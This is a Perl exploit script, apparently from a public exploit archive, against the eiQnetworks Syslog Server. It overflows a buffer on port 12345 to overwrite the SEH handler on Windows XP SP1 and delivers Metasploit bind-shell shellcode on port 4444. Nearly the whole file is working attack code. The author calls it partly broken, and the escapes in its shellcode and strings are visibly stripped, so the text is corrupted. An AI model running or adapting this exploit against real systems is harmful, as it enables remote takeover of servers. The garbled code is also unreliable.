#!/usr/bin/perl -w
# 
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006
# Bug found by KF of digitalmunition.com.
#
# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
#
# Exploit for * Syslog Server by eiQnetworks  (OEM for Several vendors)
#
# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default
#
# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a 
# forward jump. This would eliminate the need for 2 stages of shellcode. .  
#
#SEH chain of thread 00000FF4
#Address    SE handler
#013ECEF8   FWASyslo.00449EDB
#013EFF78   WS2HELP.71AA15CF   <-------- I set this address. 
#
#013EFF74   90909090
#013EFF78   909032EB  Pointer to next SEH record  <--- I set this. 
#013EFF7C   71AA15CF  SE handler   <--- pop pop ret 
#013EFF80   90909090
#
#71AA15CF   5F               POP EDI
#71AA15D0   5D               POP EBP
#71AA15D1   C2 0800          RETN 8
#
# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode.
#
use IO::Socket;

$bufsize = 4096; 

$hostname = "127.0.0.1";
$nextserec = pack("l", (0xEB069090)); # jmp short +0x06
$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll  (Send this reversed note the 'V')

# Binary hunts performed by JxT and Titon
$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. 

unless (($target,$hostname) = @ARGV,$hostname) {

        print "n        Syslog by eiQnetworks exploit, kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006n";
        print "nnUsage: $0 <target> <host>nnTargets:nn";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/:/,$tgts{"$key"});
                print "t$key . $an";
        }

        print "n";
        exit 1;
}


($a,$b) = split(/:/,$tgts{"$target"});
print "*** Target: $a, Len: $bn";

# Stage 2 shellcode can be up to Length of SEH overwrite. 
$sc2 = 
# win32_bind -  EXITFUNC=seh LPORT=4444 
# Size=344 Encoder=PexFnstenvSub http://metasploit.com
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xb2".
"xfaxa1x2cx83xebxfcxe2xf4x4ex90x4ax61x5ax03x5exd3".
"x4dx9ax2ax40x96xdex2ax69x8ex71xddx29xcaxfbx4exa7".
"xfdxe2x2ax73x92xfbx4ax65x39xcex2ax2dx5cxcbx61xb5".
"x1ex7ex61x58xb5x3bx6bx21xb3x38x4axd8x89xaex85x04".
"xc7x1fx2ax73x96xfbx4ax4ax39xf6xeaxa7xedxe6xa0xc7".
"xb1xd6x2axa5xdexdexbdx4dx71xcbx7ax48x39xb9x91xa7".
"xf2xf6x2ax5cxaex57x2ax6cxbaxa4xc9xa2xfcxf4x4dx7c".
"x4dx2cxc7x7fxd4x92x92x1exdax8dxd2x1exedxaex5exfc".
"xdax31x4cxd0x89xaax5exfaxedx73x44x4ax33x17xa9x2e".
"xe7x90xa3xd3x62x92x78x25x47x57xf6xd3x64xa9xf2x7f".
"xe1xa9xe2x7fxf1xa9x5exfcxd4x92xb0x70xd4xa9x28xcd".
"x27x92x05x36xc2x3dxf6xd3x64x90xb1x7dxe7x05x71x44".
"x16x57x8fxc5xe5x05x77x7fxe7x05x71x44x57xb3x27x65".
"xe5x05x77x7cxe6xaexf4xd3x62x69xc9xcbxcbx3cxd8x7b".
"x4dx2cxf4xd3x62x9cxcbx48xd4x92xc2x41x3bx1fxcbx7c".
"xebxd3x6dxa5x55x90xe5xa5x50xcbx61xdfx18x04xe3x01".
"x4cxb8x8dxbfx3fx80x99x87x19x51xc9x5ex4cx49xb7xd3".
"xc7xbex5exfaxe9xadxf3x7dxe3xabxcbx2dxe3xabxf4x7d".
"x4dx2axc9x81x6bxffx6fx7fx4dx2cxcbxd3x4dxcdx5exfc".
"x39xadx5dxafx76x9ex5exfaxe0x05x71x44x42x70xa5x73".
"xe1x05x77xd3x62xfaxa1x2c";

# Stage 1 shellcode can only be 128 butes. 
# 12 byte Nop find code by skylined?  This is bullshit right now... it does not hunt for the right shit. 
$sc1 = "x5fx54x90xb8x90x90xfcx90xafxf2xc3x57";

# for XP SP1  
#  <nops> <stage 2 shellcode><jmp code> <pop pop ret> <nops> <128 byte or less stage 1 shellcode> 

# Should total 4096
$buf = "x90" x ($b - length($sc2)) . $sc2 . $nextserec  . $sehandler . "x90" x (128 - length($sc1)) . $sc1 . "x58" x ($bufsize-$b-8-128);  

print "Exploiting $hostnamen";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$hostname, PeerPort=>12345, Type=>SOCK_STREAM);

$sock or die "no socket :$!n"; 

print $sock "$buf";
close $sock;

# www.Syue.com [2006-07-27]